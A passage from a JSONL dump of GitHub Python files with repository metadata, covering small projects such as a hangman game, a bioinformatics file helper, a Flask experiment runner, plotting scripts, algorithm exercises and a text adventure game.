line)\n line = line.strip()\n if line:\n text.append(line)\n data = {'id': _id, 'text': '|'.join(text)}\n print(data)\n return data\n\n\ndef save_data(file_path, data):\n with open(file_path, 'a', 
encoding='utf8') as fp:\n fp.write(json.dumps(data, ensure_ascii=False) + '\\n')\n\n\ndef main():\n file_list = os.listdir('./data/input/')\n for file in file_list:\n file_path = os.path.join('./data/input/', file)\n data = get_data(file_path)\n save_data(r'D:\\work\\文档解析\\data\\output\\test_data.txt', data)\n\n\nif __name__ == '__main__':\n main()\n # data = get_data('D:\\work\\文档解析\\data\\input\\知识图谱构建方法研究.txt')\n # save_data(r'D:\\work\\文档解析\\data\\output\\test_data.txt', data)\n\n\n\n\n\n\n\n\n\n","repo_name":"ReigenDing/doc_extract","sub_path":"make_data.py","file_name":"make_data.py","file_ext":"py","file_size_in_byte":1067,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"20536968515","text":"import random\r\n\r\n\r\nclass juegoAhorcado:\r\n ESTADOS = [\r\n r\"\"\"\r\n +--+\r\n | |\r\n |\r\n |\r\n |\r\n |\r\n =====\"\"\",\r\n r\"\"\"\r\n +--+\r\n | |\r\n O |\r\n |\r\n |\r\n |\r\n =====\"\"\",\r\n r\"\"\"\r\n +--+\r\n | |\r\n O |\r\n | |\r\n |\r\n |\r\n =====\"\"\",\r\n r\"\"\"\r\n +--+\r\n | |\r\n O |\r\n /| |\r\n |\r\n |\r\n =====\"\"\",\r\n r\"\"\"\r\n +--+\r\n | |\r\n O |\r\n /|\\ |\r\n |\r\n |\r\n =====\"\"\",\r\n r\"\"\"\r\n +--+\r\n | |\r\n O |\r\n /|\\ |\r\n / |\r\n |\r\n =====\"\"\",\r\n r\"\"\"\r\n +--+\r\n | |\r\n O |\r\n /|\\ |\r\n / \\ |\r\n |\r\n =====\"\"\"]\r\n\r\n SALVADO = [\r\n r\"\"\"\r\n +--+\r\n |\r\n |\r\n \\O/ |\r\n | |\r\n / \\ |\r\n =====\"\"\"]\r\n\r\n Categoria = 'FRUTAS JUEGOS DEPORTES'.split()\r\n Frutas = 'PERA PLATANO UVA MANZANA MELOCOTON KIWI ALBARICOQUE CEREZA CIRUELA FRESA GRANADA HIGO LIMA LIMON MANDARINA NARANJA MELON MORA NISPERO PIÑA POMELO SANDIA '.split()\r\n Juegos = 'LOL MINECRAFT FORNITE ISAAC POKEMON BLASPHEMOUS'.split()\r\n Deportes = 'NATACION FUTBOL TENIS BALONMANO BALONCESTO SOCORRISMO'.split()\r\n\r\n\r\n def jugar(self):\r\n\r\n letrasIncorrectas = []\r\n letrasCorrectas = []\r\n categoria = random.choice(self.Categoria)\r\n if categoria == \"FRUTAS\":\r\n secreto = random.choice(self.Frutas)\r\n elif categoria == \"JUEGOS\":\r\n secreto = random.choice(self.Juegos)\r\n else:\r\n secreto = random.choice(self.Deportes)\r\n\r\n while True:\r\n self.dibujar(letrasIncorrectas, letrasCorrectas, secreto, categoria)\r\n\r\n letraDicha = self.dimeLetra(letrasIncorrectas + letrasCorrectas)\r\n\r\n if letraDicha == \"TERMINAR\":\r\n print(self.ESTADOS[6])\r\n print(\"La palabra era \", secreto)\r\n break\r\n\r\n if letraDicha in secreto:\r\n\r\n letrasCorrectas.append(letraDicha)\r\n\r\n salvado = True\r\n for solucion in secreto:\r\n if solucion not in letrasCorrectas:\r\n salvado = False\r\n break\r\n if salvado:\r\n print(self.SALVADO[0])\r\n print('¡Bien hecho! 
la palabra secreta es :', secreto)\r\n print('Has ganado!')\r\n break\r\n else:\r\n letrasIncorrectas.append(letraDicha)\r\n\r\n if len(letrasIncorrectas) == len(self.ESTADOS) - 1:\r\n self.dibujar(letrasIncorrectas, letrasCorrectas, secreto, categoria)\r\n print('Demasiados intentos!')\r\n print('La palabra era \"{}\"'.format(secreto))\r\n break\r\n\r\n def dibujar(self, letrasIncorrectas, letrasCorrectas, secreto, categoria):\r\n print(self.ESTADOS[len(letrasIncorrectas)])\r\n print('La categoría es: ', categoria)\r\n print()\r\n\r\n print('Letras incorrectas: ', end='')\r\n for letra in letrasIncorrectas:\r\n print(letra, end=' ')\r\n if len(letrasIncorrectas) == 0:\r\n print('No hay letras incorrectas.')\r\n\r\n print()\r\n\r\n longitudPalabra = ['_'] * len(secreto)\r\n\r\n for i in range(len(secreto)):\r\n if secreto[i] in letrasCorrectas:\r\n longitudPalabra[i] = secreto[i]\r\n\r\n print(' '.join(longitudPalabra))\r\n\r\n def dimeLetra(self, letraDicha):\r\n while True:\r\n print('Adivina una letra.')\r\n adivina = input('> ').upper()\r\n if adivina == \"TERMINAR\":\r\n return adivina\r\n elif len(adivina) != 1:\r\n print('Introduce una única letra.')\r\n elif adivina in letraDicha:\r\n print('Esa letra ya la sabías. Elige otra vez.')\r\n elif not adivina.isalpha():\r\n print('Introduce una LETRA.')\r\n\r\n else:\r\n return adivina\r\n\r\n\r\nif __name__ == '__main__':\r\n juego1 = juegoAhorcado()\r\n juego1.jugar()\r\n","repo_name":"Sevigamer/ahorcado","sub_path":"ahorcado.py","file_name":"ahorcado.py","file_ext":"py","file_size_in_byte":4348,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"26446277124","text":"import asyncio\nimport time\nimport pandas as pd\n\nimport 
asyncio.run(main())\n","repo_name":"delftdata/stateflow-runtime","sub_path":"demo-ycsb/read_own_writes_demo.py","file_name":"read_own_writes_demo.py","file_ext":"py","file_size_in_byte":1739,"program_lang":"python","lang":"de","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"42504541344","text":"import pandas as pd\n\nfrom bioinf_workflows.utils import tools as ts\n\nBED_FILE = [\n \"chr\",\n \"start\",\n \"end\",\n \"id\",\n \"mapq\",\n \"strand\",\n \"cigar\"\n]\n\nBED_FILE_ANNO = [\n \"chr\",\n \"start\",\n \"end\",\n \"id\",\n \"mapq\",\n \"strand\",\n \"cigar\",\n \"ens_chr\",\n \"ens_start\",\n \"ens_end\",\n \"ens_annotation\",\n \"ens_strand\",\n \"ens_ensid\",\n \"ens_gsymbol\",\n \"ens_transid\",\n \"ens_num\"\n]\n\n\ndef remove2bpinsertions(insamfile,\n sam_out):\n \"\"\"\n Remove insertions that are one or two base pairs away from each other.\n :param insamfile: input SAM file\n :param sam_out: file object to write content\n :return: file object to write content (???)\n \"\"\"\n\n sam_file = ts.load_file(insamfile)\n\n for index in range(len(sam_file)):\n if index == 0:\n sam_out.writelines('\\t'.join(sam_file[index-1]))\n sam_out.writelines(\"\\n\")\n continue\n\n # samfile chromosome position is column 4\n position = int(sam_file[index-1][3])\n next_read = sam_file[index]\n next_position = int(next_read[3])\n bp_distance = abs(next_position-position)\n\n if not (bp_distance <= 2):\n sam_out.writelines('\\t'.join(sam_file[index]))\n sam_out.writelines(\"\\n\")\n\n return sam_out\n\n\ndef fix_end_position(inbedfile,\n outbedfile):\n \"\"\"\n Add 1 base pair to end position in BED formatted file\n :param inbedfile: input BED file\n :param outbedfile: output BED file\n :return: None\n \"\"\"\n\n df = pd.read_csv(inbedfile, sep=\"\\t\",\n names=BED_FILE)\n df['end'] = df['start']+1\n df.to_csv(outbedfile, sep=\"\\t\", index=0, header=0)\n\n return None\n\n\n\n\n","repo_name":"sp00nman/bioinf_workflows","sub_path":"bioinf_workflows/bioinf_workflows/utils/process_files.py","file_name":"process_files.py","file_ext":"py","file_size_in_byte":1744,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"78"} +{"seq_id":"2175698187","text":"import json\nimport pickle\nfrom datetime import datetime\n\nfrom flask import current_app\nfrom sqlalchemy.exc import SQLAlchemyError\n\nfrom app.dist_task.src.dist_system.client import Client\nfrom app.mysql import DrawMLRepository\nfrom app.mysql_models import Data, TrainedModel, Experiment\nfrom app.redis import redis_cache, RedisKeyMaker\n\n\nclass TaskRunner:\n \"\"\"\n Deprecated\n USE common.object_code.util\n \"\"\"\n def __init__(self, user_id: int, xml,\n data_obj_code, data_input_files, data_key: str,\n model_obj_code, model_input_file, model_key: str):\n self.user_id = user_id\n self.xml = xml\n self.data_obj_code = data_obj_code\n self.data_input_files = data_input_files\n self.data_key = data_key,\n self.model_obj_code = model_obj_code\n self.model_input_file = model_input_file\n self.model_key = model_key\n self.valid = True\n self.entry_arguments = None\n self.config()\n\n def config(self):\n check_data = (self.data_obj_code is not None and self.data_input_files is not None)\n check_model = (self.model_obj_code is not None and self.model_input_file is not None)\n if not check_data and not check_model:\n self.valid = False\n return\n\n if check_model:\n # Gonna be changed to 'model_input_file'\n input_path = 'app/common/object_code/test/linear_regression_input.txt'\n\n def 
get_dummy_input(input_path: str):\n with open(input_path, 'r', encoding='utf-8') as f:\n return f.read()\n\n tensorflow_train_task_job_dict = dict()\n tensorflow_train_task_job_dict['data_file_token'] = get_dummy_input(input_path)\n tensorflow_train_task_job_dict['object_code'] = self.model_obj_code\n\n self.entry_arguments = dict(\n experiment_id=self.model_key,\n task_type=Client.TaskType.TYPE_TENSORFLOW_TRAIN_TASK,\n task_job_dict=tensorflow_train_task_job_dict,\n callback=self.create_callback(self.model_key, self.entry_arguments)\n )\n\n if check_data:\n data_processing_task_job_dict = dict()\n data_processing_task_job_dict['data_file_num'] = len(self.data_input_files)\n data_processing_task_job_dict['data_file_token_list'] = self.data_input_files\n data_processing_task_job_dict['object_code'] = self.data_obj_code\n\n self.entry_arguments = dict(\n experiment_id=self.model_key,\n task_type=Client.TaskType.TYPE_DATA_PROCESSING_TASK,\n task_job_dict=data_processing_task_job_dict,\n callback=self.create_callback(str(self.data_key), self.entry_arguments)\n )\n return\n\n def create_callback(self, task_key: str, task_args: dict):\n \"\"\"\n # # Callback parameter\n # \n # - [\"success\", \"error\", \"cancel\"]: str\n # \n # - dict when \"success\",\n # { \"stdout\", \"stderr\", \"result_file_token\", \"session_file_token\" }\n # - str when \"error\"\n # - None when \"cancel\"\n \"\"\"\n key = task_key\n db = DrawMLRepository().db\n if task_args is not None:\n next_arguments = task_args\n\n def _callback(status: str, body=None):\n print('[run_experiment] ', 'callbacked! ')\n\n if status == 'success':\n task_type = key.split('-')[1]\n if task_type == str(RedisKeyMaker.DATA_PROCESSING):\n exp_id = key.split('-')[0]\n current_time = datetime.now().isoformat()\n file_name = exp_id + 'exp-data-' + current_time\n file_token = body.get('result_file_token', None)\n new_data = Data(name=file_name, user_id=self.user_id, path=file_token, type='log')\n try:\n db.session.add(new_data)\n db.session.commit()\n except SQLAlchemyError as e:\n db.session.rollback()\n redis_cache.set(key, redis_cache.FAIL)\n current_app.logger.error(e)\n return\n # update file token\n next_arguments['data_file_token'] = file_token\n current_app.logger.info('data created :' + str(new_data))\n elif task_type == str(RedisKeyMaker.MODEL_TRAINING):\n exp_id = key.split('-')[0]\n current_time = datetime.now().isoformat()\n file_name = exp_id + 'exp-train-' + current_time\n file_token = body.get('session_file_token', None)\n new_model = TrainedModel(name=file_name, user_id=self.user_id,\n path=file_token, xml=pickle.dumps(self.xml))\n try:\n db.session.add(new_model)\n db.session.commit()\n except SQLAlchemyError as e:\n db.session.rollback()\n redis_cache.set(key, redis_cache.FAIL)\n current_app.logger.error(e)\n return\n current_time = datetime.now().isoformat()\n file_name = exp_id + 'exp-train-result-' + current_time\n file_token = body.get('result_file_token', None)\n new_data = Data(name=file_name, user_id=self.user_id, path=file_token, type='log')\n try:\n db.session.add(new_data)\n db.session.commit()\n except SQLAlchemyError as e:\n db.session.rollback()\n redis_cache.set(key, redis_cache.FAIL)\n current_app.logger.error(e)\n return\n redis_cache.set(key, redis_cache.SUCCESS)\n print(\"[%d] callback is called with 'success'\" % key)\n elif status == 'error':\n redis_cache.set(key, redis_cache.FAIL)\n print(\"[%d] callback is called with 'fail'\" % key)\n elif status == 'cancel':\n # Client().request_cancel(key)\n 
redis_cache.set(key, redis_cache.CANCEL)\n print(\"[%d] callback is called with 'cancel'\" % key)\n\n if body is not None:\n print(body['stderr'])\n\n if next_arguments:\n redis_cache.set(next_arguments['experiment_id'], redis_cache.RUNNING)\n Client().request_task(**next_arguments)\n\n return _callback\n\n def run(self):\n if self.valid is False:\n return self.valid\n redis_cache.set(self.entry_arguments['experiment_id'], redis_cache.RUNNING)\n Client().request_task(**self.entry_arguments)\n return self.valid\n\n\nclass Refiner(json.JSONEncoder):\n def __init__(self, exps):\n super().__init__()\n if type(exps) is not list:\n self.exps = self.exp_to_dict(exps)\n else:\n self.exps = []\n for exp in exps:\n temp = self.exp_to_dict(exp)\n self.exps.append(temp)\n\n def exp_to_dict(self, exp):\n exp_dict = dict(\n id=exp.id,\n date_modified=str(exp.date_modified),\n date_created=str(exp.date_created),\n user_id=exp.user_id,\n name=exp.name,\n xml=pickle.loads(exp.xml),\n drawing=pickle.loads(exp.drawing)\n )\n return exp_dict\n\n\nclass JsonParser:\n @staticmethod\n def parse_post(json, user_id):\n try:\n exp_json = json['exp_data']\n exp_data = Experiment(exp_json['name'],\n user_id,\n pickle.dumps(exp_json['xml']),\n pickle.dumps(exp_json['drawing']))\n except KeyError as e:\n return e\n return exp_data","repo_name":"DrawML/was-flask","sub_path":"app/experiment/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":8219,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"70140749052","text":"import matplotlib.pyplot as plt\nimport torch, sys\nimport argparse\nimport numpy as np\n\n\ndef visualize_clf(checkpoint):\n t_losses = checkpoint['t_loss']\n t_accuracies = checkpoint['t_acc']\n v_losses = checkpoint['v_loss']\n v_accuracies = checkpoint['v_acc']\n\n fig, ((ax1,ax2),(ax3,ax4)) = plt.subplots(nrows=2, ncols=2)\n ax1.title.set_text(\"Training loss per Iter\")\n ax1.plot(t_losses)\n ax2.title.set_text(\"Training accuracy per Epoch\")\n ax2.plot(t_accuracies)\n ax3.title.set_text(\"Validation loss per Epoch\")\n ax3.plot(v_losses)\n ax4.title.set_text(\"Validation Accuracy per Epoch\")\n ax4.plot(v_accuracies)\n\n fig.subplots_adjust(hspace=1.0)\n\ndef visualize_gan(checkpoint):\n dis_losses = checkpoint['dis_loss']\n gen_losses = checkpoint['gen_loss']\n\n adv_losses = [gen_loss['adversarial_loss'] for gen_loss in gen_losses]\n hinge_losses = [gen_loss['hinge_loss'] for gen_loss in gen_losses]\n fooling_losses = [gen_loss['fooling_loss'] for gen_loss in gen_losses]\n\n num_iters = len(adv_losses)\n\n x = np.linspace(0, num_iters, num_iters)\n plt.plot(x, dis_losses, label=\"Discriminator Loss\")\n plt.plot(x, adv_losses, label=\"Adversarial Loss\")\n plt.plot(x, fooling_losses, label=\"Fooling Loss\")\n plt.plot(x, hinge_losses, label=\"Pertubation Regularization Loss\")\n\n plt.legend()\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--gan\", action=\"store_true\")\n parser.add_argument(\"-p\", \"--checkpoint-path\", type=str)\n args = parser.parse_args()\n chkpt_path = args.checkpoint_path\n checkpoint = torch.load(chkpt_path, map_location=torch.device('cpu'))\n\n if args.gan:\n visualize_gan(checkpoint)\n else:\n visualize_clf(checkpoint)\n \n 
plt.show()","repo_name":"Axquaris/cs182project","sub_path":"visualize_training.py","file_name":"visualize_training.py","file_ext":"py","file_size_in_byte":1787,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"17658555466","text":"def solution(seq, k):\n l = len(seq)\n total = [0] * (l + 1)\n answer = []\n p2 = 0\n for i in range(1, l + 1):\n total[i] = total[i - 1] + seq[i - 1]\n for p1 in range(l + 1):\n end = l\n while p2 < end and total[p2] - total[p1] < k:\n p2 += 1\n if p2 <= end and total[p2] - total[p1] == k:\n answer.append((p2 - p1, [p1, p2 - 1]))\n answer.sort(key = lambda x: x[0])\n return answer[0][1]","repo_name":"mhd329/programmers","sub_path":"연속된부분수열의합/0.py","file_name":"0.py","file_ext":"py","file_size_in_byte":450,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"75232963451","text":"# -*- coding: utf-8 -*-\r\n\r\n\"\"\"\r\n ORCA Open Remote Control Application\r\n Copyright (C) 2013-2020 Carsten Thielepape\r\n Please contact me by : http://www.orca-remote.org/\r\n\r\n This program is free software: you can redistribute it and/or modify\r\n it under the terms of the GNU General Public License as published by\r\n the Free Software Foundation, either version 3 of the License, or\r\n (at your option) any later version.\r\n\r\n This program is distributed in the hope that it will be useful,\r\n but WITHOUT ANY WARRANTY; without even the implied warranty of\r\n MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\r\n GNU General Public License for more details.\r\n\r\n You should have received a copy of the GNU General Public License\r\n along with this program. If not, see .\r\n\"\"\"\r\nimport ORCA.Globals as Globals\r\nfrom ORCA.utils.FileName import cFileName\r\nfrom ORCA.utils.Path import cPath\r\nfrom ORCA.vars.Access import SetVar\r\n\r\n__all__ = ['cDefinitionPathes']\r\n\r\nclass cDefinitionPathes:\r\n \"\"\" Class , which is a representation of all pathes of a definition \"\"\"\r\n def __init__(self, *,uDefinitionName:str, uDefinitionPathName:str=u\"\") -> None:\r\n uAdd:str\r\n self.oPathDefinition:cPath\r\n self.oPathDefinitionSkinElements:cPath\r\n oPathCheck:cPath\r\n uCheck:str\r\n\r\n if Globals.uDeviceOrientation == 'landscape':\r\n uAdd = 'l'\r\n else:\r\n uAdd = 'p'\r\n if Globals.fScreenSize<5.1:\r\n uAdd += 's'\r\n else:\r\n uAdd += 'l'\r\n\r\n if uDefinitionPathName==u\"\":\r\n self.oPathDefinition = Globals.oPathDefinitionRoot + uDefinitionName\r\n else:\r\n self.oPathDefinition = Globals.oPathDefinitionRoot + uDefinitionPathName\r\n\r\n self.oPathDefinitionAtlas:cPath = self.oPathDefinition + 'atlas'\r\n self.oFnDefinitionAtlas:cFileName = cFileName(self.oPathDefinitionAtlas) + u'definition.atlas'\r\n self.oFnDefinitionLocalFont:cFileName = cFileName(self.oPathDefinition + u'fonts') + 'fonts.xml'\r\n self.oFnDefinition:cFileName = cFileName(self.oPathDefinition) + u'definition.xml'\r\n self.oFnDefinitionCache:cFileName = cFileName(self.oPathDefinition) + (u'cache_' + uAdd + '.xml')\r\n self.oFnDefinitionIni:cFileName = cFileName(self.oPathDefinition) + u'definition.ini'\r\n self.oPathDefinitionInterfaceSettings:cPath = self.oPathDefinition + u'interfacesettings'\r\n self.oPathDefinitionScriptSettings:cPath = self.oPathDefinition + u'scriptsettings'\r\n self.oFnDefinitionLanguage:cFileName = cFileName()\r\n self.oFnDefinitionLanguageFallBack:cFileName = cFileName(self.oPathDefinition + u'languages/English')+ 
\"strings.xml\"\r\n self.oPathDefinitionSkinElements:cPath = self.oPathDefinition + u'elements'\r\n self.oPathTemplateSkinElements:cFileName = cFileName()\r\n\r\n uCheck = \"skin_\" + Globals.uSkinName\r\n oPathCheck = self.oPathDefinitionSkinElements + uCheck\r\n if oPathCheck.Exists():\r\n self.oPathDefinitionSkinElements = oPathCheck\r\n SetVar(\"SKINCONTEXT\",uCheck)\r\n else:\r\n self.oPathDefinitionSkinElements = self.oPathDefinitionSkinElements + \"skin_default\"\r\n SetVar(\"SKINCONTEXT\", \"skin_default\")\r\n\r\n self.LanguageChange()\r\n\r\n if uDefinitionName in Globals.oDefinitions:\r\n if \"definition_templatename_mediaplayer_wizard\" in Globals.oDefinitions[uDefinitionName].oDefinitionVars:\r\n oPathCheck = Globals.oPathWizardTemplates +(Globals.oDefinitions[uDefinitionName].oDefinitionVars[\"definition_templatename_mediaplayer_wizard\"]+\"/elements/\" +uCheck)\r\n if oPathCheck.Exists():\r\n self.oPathTemplateSkinElements = oPathCheck\r\n SetVar(\"MEDIATEMPLATESKINCONTEXT\",uCheck)\r\n else:\r\n self.oPathDefinitionSkinElements = Globals.oPathWizardTemplates +(Globals.oDefinitions[uDefinitionName].oDefinitionVars[\"definition_templatename_mediaplayer_wizard\"]+\"/elements/\" + \"skin_default\")\r\n SetVar(\"MEDIATEMPLATESKINCONTEXT\", \"skin_default\")\r\n\r\n def LanguageChange(self) -> None:\r\n \"\"\"\r\n changes the filename of the definition language file\r\n :return:\r\n \"\"\"\r\n self.oFnDefinitionLanguage = cFileName(self.oPathDefinition + (u'languages/' + Globals.uLanguage)) + u'strings.xml'\r\n return None","repo_name":"thica/ORCA-Remote","sub_path":"src/ORCA/definition/DefinitionPathes.py","file_name":"DefinitionPathes.py","file_ext":"py","file_size_in_byte":4650,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"78"} +{"seq_id":"30306037071","text":"\ndef quick(A):\n\tif len(A) == 0:\n\t\treturn []\n\tpivot = A.pop(0)\n\tL, R = [], []\n\tfor e in A:\n\t\tif e <= pivot:\n\t\t\tL.append(e)\n\t\telse:\n\t\t\tR.append(e)\n\treturn quick(L) + [pivot] + quick(R)\n\nprint(quick([3, 7, 4, 1]))","repo_name":"krxwer4/DS","sub_path":"quick.py","file_name":"quick.py","file_ext":"py","file_size_in_byte":210,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"71319139453","text":"from collections import deque\n\n\ndef solution(A, B):\n answer = 0\n A.sort()\n B.sort()\n A = deque(A)\n B = deque(B)\n while B:\n if A[0] < B[0]:\n answer += 1\n A.popleft()\n B.popleft()\n else:\n B.popleft()\n return answer","repo_name":"LimSB-dev/BaekjoonHub","sub_path":"프로그래머스/lv3/12987. 숫자 게임/숫자 게임.py","file_name":"숫자 게임.py","file_ext":"py","file_size_in_byte":291,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"33065366374","text":"answer_A = [\"A\", \"a\"]\nanswer_B = [\"B\", \"b\"]\nanswer_C = [\"C\", \"c\"]\nyes = [\"Y\", \"y\", \"yes\"]\nno = [\"N\", \"n\", \"no\"]\n\nsword = False\n\ndef intro():\n print(\"After a drunken night out with friends, you awaken in a thick, dank forest. A slobbering orc is running towards you.\")\n\n print(\"A. Grab a nearby rock and throw it at the orc\")\n print(\"B. Lie down and wait to be mauled\")\n print(\"C. Run\")\n\n choice = str(input())\n\n if choice in answer_A:\n option_rock()\n elif choice in answer_B:\n print(\"Welp, that was quick. You died!\")\n elif choice in answer_C:\n option_run()\n\ndef option_rock():\n print(\"The orc is stunned, but regains control. 
He begins running towards you again.\")\n\n print(\"A. Run\")\n print(\"B. Throw another rock\")\n print(\"C. Run towards a nearby cave\")\n\n choice = str(input())\n if choice in answer_A:\n option_run()\n elif choice in answer_B:\n print(\"The rock flew well over the orcs head. You missed. You died!\")\n elif choice in answer_C:\n option_cave()\n\ndef option_cave():\n print(\"Before you fully enter, you notice a shiny sword on the ground. Do you pick up a sword. Y/N?\")\n\n choice = str(input())\n if choice in yes:\n sword = True\n elif choice in no:\n sword = False\n\n print(\"What do you do next?\")\n\n print(\"A. Hide in silence\")\n print(\"B. Fight\")\n print(\"C. Run\")\n\n choice = str(input())\n if choice in answer_A:\n print(\"I think orcs can see very well in the dark, right? You died!\")\n elif choice in answer_B:\n if sword == False:\n print(\"You're defenseless. You died!\")\n elif sword == True:\n print(\"As the orc reached out to grab the sword, you pierced the blade into its chest. You survived!\")\n elif choice in answer_C:\n print(\"The orc turns around and sees you running.\")\n option_run()\n\ndef option_run():\n print(\"You run as quickly as possible.\")\n\n print(\"A. Hide behind boulder\")\n print(\"B. Trapped, so you fight\")\n print(\"C. Run towards an abandoned town\")\n\n choice = str(input())\n\n if choice in answer_A:\n print(\"You're easily spotted. You died!\")\n elif choice in answer_B:\n print(\"You're no match for an orc. You died!\")\n elif choice in answer_C:\n option_town()\n\ndef option_town():\n print(\"You notice a purple flower near your foot. Do you pick it up? Y/N\")\n\n choice = str(input())\n\n if choice in yes:\n print(\"You quickly hold out the purple flower. The orc was looking for love. This got weird, but you survived!\")\n elif choice in no:\n print(\"Maybe you should have picked up the flower. 
You died!\")\n\nintro()\n","repo_name":"NIAEFEUP/slides","sub_path":"python-workshop/text_based_game.py","file_name":"text_based_game.py","file_ext":"py","file_size_in_byte":2522,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"78"} +{"seq_id":"12806935965","text":"import mindspore\r\nfrom mindspore import ops\r\n\r\nfrom evaluation.evaluation import top_k_accuracy\r\nfrom model.posec3d.recognizer3d import Recognizer3d\r\nfrom dataset import FLAG2DPoseC3DValDatasetGenerator\r\nimport mindspore.dataset as ds\r\n\r\n\r\ndef val(dataset_val, model):\r\n i = 0 # iteration num\r\n total_acc_top1 = 0.\r\n total_acc_top5 = 0.\r\n\r\n model.set_train(False)\r\n for data in dataset_val.create_dict_iterator():\r\n x = data[\"keypoint\"]\r\n label = data[\"label\"].to(mindspore.int32)\r\n y = model(x)\r\n batch_acc = top_k_accuracy(y.numpy(), label.numpy(), (1,5))\r\n print(label,ops.argmax(y,axis=1))\r\n\r\n total_acc_top1 += batch_acc[0]\r\n total_acc_top5 += batch_acc[1]\r\n\r\n i += 1\r\n\r\n\r\n accuracy_top1 = total_acc_top1 / i\r\n accuracy_top5 = total_acc_top5 / i\r\n print(\"accuracy_top1: \", accuracy_top1 ,\"accuracy_top5: \", accuracy_top5)\r\n\r\ndataset_val_generator = FLAG2DPoseC3DValDatasetGenerator(\"D:/data/flag2d.pkl\", 500)\r\ndataset_val = ds.GeneratorDataset(dataset_val_generator, [\"keypoint\", \"label\"], shuffle=True).batch(\r\n 1, True)\r\nprint(\"dataset success\")\r\n\r\nmodel = Recognizer3d(\r\n depth=50,\r\n pretrained=None,\r\n in_channels=17,\r\n base_channels=32,\r\n num_stages=3,\r\n out_indices=(2,),\r\n stage_blocks=(4, 6, 3),\r\n conv1_stride_s=1,\r\n pool1_stride_s=1,\r\n inflate=(0, 1, 1),\r\n spatial_strides=(2, 2, 2),\r\n temporal_strides=(1, 1, 2),\r\n dilations=(1, 1, 1),\r\n num_classes=60,\r\n in_channels_head=512,\r\n spatial_type='avg',\r\n dropout_ratio=0.5\r\n )\r\nprint(\"model success\")\r\n# for param in model.trainable_params():\r\n# print(param)\r\nmodel.set_train(False)\r\nfor param in model.trainable_params():\r\n print(param)\r\n\r\nparam_dict = mindspore.load_checkpoint(\"../chpk_resume/posec3d_2d.ckpt\")\r\nfor i in param_dict:\r\n print(param_dict[i])\r\nmindspore.load_param_into_net(model, param_dict)\r\nprint(\"chpk success\")\r\n\r\nval(dataset_val, model)\r\nprint(\"val success\")\r\n","repo_name":"MysticFace-0/st_gcn_mindspore","sub_path":"test/PoseC3D_2d.py","file_name":"PoseC3D_2d.py","file_ext":"py","file_size_in_byte":2065,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"26955900252","text":"# 124. Binary Tree Maximum Path Sum\n# Hard\n\n# A path in a binary tree is a sequence of nodes where each pair of adjacent nodes in the sequence has an edge connecting them. A node can only appear in the sequence at most once. 
Note that the path does not need to pass through the root.\n\n# The path sum of a path is the sum of the node's values in the path.\n\n# Given the root of a binary tree, return the maximum path sum of any non-empty path.\n\n \n\n# Example 1:\n\n\n# Input: root = [1,2,3]\n# Output: 6\n# Explanation: The optimal path is 2 -> 1 -> 3 with a path sum of 2 + 1 + 3 = 6.\n# Example 2:\n\n\n# Input: root = [-10,9,20,null,null,15,7]\n# Output: 42\n# Explanation: The optimal path is 15 -> 20 -> 7 with a path sum of 15 + 20 + 7 = 42.\n \nclass TreeNode:\n    def __init__(self, val=0, left=None, right=None):\n        self.val = val\n        self.left = left\n        self.right = right\n\nclass Solution:\n    def __init__(self):\n        self.maxSum = float('-inf')\n\n    def maxPathSum(self, root):\n        def traverse(node):\n            if node:\n                left = traverse(node.left)\n                right = traverse(node.right)\n                # a path may turn at this node and use both subtrees\n                self.maxSum = max(self.maxSum, node.val, node.val + left, node.val + right, node.val + left + right)\n                # the parent may extend only one downward branch\n                return max(node.val, node.val + left, node.val + right)\n            else:\n                return 0\n        traverse(root)\n        return self.maxSum\n\n\nif __name__ == \"__main__\":\n    root = TreeNode(1, TreeNode(2), TreeNode(3))\n    print(\"{}\".format(Solution().maxPathSum(root)))","repo_name":"smohapatra1/scripting","sub_path":"python/practice/start_again/2023/09112023/binary_tree_maximum_path_sum.py","file_name":"binary_tree_maximum_path_sum.py","file_ext":"py","file_size_in_byte":1274,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"}{"seq_id":"35228338890","text":"T = [2,9,3,1,7,11,9,6,7,7,1,3,9,12,15]\nN = len(T)\n\nmaxi = -1\n\nfor i in range(N):\n    for j in range(N-1, -1, -1):\n\n        if T[i] == T[j]:\n\n            current = 1\n            k = 1\n\n            while i + k < N and j - k >= 0 and T[i+k] == T[j-k]:\n                k+=1\n                current+=1\n            \n            if current > maxi:\n                maxi = current\n\nprint(maxi)\n\n# wow, damn, this worked straight off the top of my head, kinda in shock ngl","repo_name":"JakubFr4czek/WDI","sub_path":"Zestaw3/13.py","file_name":"13.py","file_ext":"py","file_size_in_byte":446,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"}{"seq_id":"74751424573","text":"import os\nimport json\nimport random\nimport email_ticket\n\n\ndef main():\n    print('\\n')\n\n    play = input('Which game would you like to play? ').lower()\n    amount_tickets = int(input('How many tickets would you like? '))\n    email_receipt = input(\"Would you like to send an email of the tickets? (yes/no) \").lower()\n\n    while amount_tickets != 0:\n        picks = gen_lotto_numbers(play)\n        ticket = print_ticket(picks)\n\n        if email_receipt == 'yes':\n            player = input(\"Enter your email address: \")\n            html_tickets = f\"
